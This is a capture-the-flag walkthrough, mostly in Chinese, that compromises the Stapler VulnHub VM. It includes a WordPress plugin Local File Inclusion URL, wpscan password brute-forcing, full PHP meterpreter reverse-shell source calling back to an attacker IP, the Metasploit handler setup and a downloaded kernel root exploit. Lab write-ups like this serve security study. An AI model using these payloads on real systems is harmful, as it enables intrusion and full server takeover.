Hack the Stapler VM (CTF Challenge)

https://www.vulnhub.com/entry/stapler-1,150/

http://www.hackingarticles.in/hack-stapler-vm-ctf-challenge/

1. 先用sparta掃過
2. 在https 12380 port上robots.txt找到線索 https://192.168.1.103:12380/robots.txt

   User-agent: *
   Disallow: /admin112233/
   Disallow: /blogblog/
   

3. 連到/blogblog/下，發現是用WP寫的，於是用wpscan掃一下
   • wpscan --url https://192.168.1.103:12380/blogblog/ --enumerate ap --enumerate at --enumerate u

     • --enumerate ap #all plugins (can take a long time)
     • --enumerate at #all themes (can take a long time)
     • --enumerate u #usernames from id 1 to 10

4. 掃完後發現兩個有用資訊：
   • Upload directory has directory listing enabled: https://192.168.1.103:12380/blogblog/wp-content/uploads/
   • 有弱點的plugin: advanced-video-embed-embed-videos-or-playlists - v1.0
5. 從exploit-db找到WordPress Plugin Advanced Video 1.0 - Local File Inclusion
6. 利用POC瀏覽wp-config.php設定檔：https://192.168.1.103:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
7. 連到https://192.168.1.103:12380/blogblog/?p=210 後雖出現錯誤訊息，但在https://192.168.1.103:12380/blogblog/ 可發現新增了一篇文章和1480089714.jpeg資訊
8. 瀏覽https://192.168.1.103:12380/blogblog/wp-content/uploads/ 發現多了個1480089714.jpeg
9. 下載後查看發現許多資訊，包括MySQL帳密，接著利用HeidiSQL_9.3_Portable等MySQL工具連上伺服器
10. 找到wp_users table，內有使用者帳號和加密過的密碼
11. 再次使用wpscan暴力破解第一組使用者帳號john，最後得到密碼為incorrect：wpscan --url https://192.168.1.103:12380/blogblog --wordlist /usr/share/wordlists/rockyou.txt --username john
12. 利用msfvenom產生php後門：msfvenom -p php/meterpreter/reverse_tecp lhost-192.168.1.102 lport=4444 -f raw內容如下：

    <?php /**/ error_reporting(0); $ip = '192.168.1.102'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die(); ?>
    

13. 使用john帳密登入後，在plugins上傳php後門
14. 打開msfconsole，輸入：

    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost 192.168.1.102
    set lport 4444
    run
    

15. 點擊php後門，此時reverse shell已建立
16. 輸入shell後，輸入：

    echo "import pty; pty.spawn('/bin/bash')" > /tmp/shell.py
    python /tmp/shell.py
    

17. 輸入lsb_release -a發現使用的作業系統版本

    No LSB modules are available.
    Distributor ID:    Ubuntu
    Description:    Ubuntu 16.04 LTS
    Release:    16.04
    Codename:    xenial
    

18. 從exploit-db找已知漏洞，發現有Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Escalation
19. 在系統上找可寫入的目錄(不懂這裡為何要找可寫入的目錄，先前不已在/tmp下建立shell.py了?)find / -writable -type d 2>/dev/null
20. 將exploit下載至/tmp底下：wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
21. 解壓縮後，執行以下指令得到root權限並取得flag

    cd ebpf_mapfd_doubleput_exploit
    ls (list the directories)
    ./compile.sh (will run the compile.sh)
    ./doubleput (will run the double.sh)
    whoami (will tell you where you have reached)
    cd /root (will take you into /root)
    ls (shows you the directories of /root)
    cat flag.txt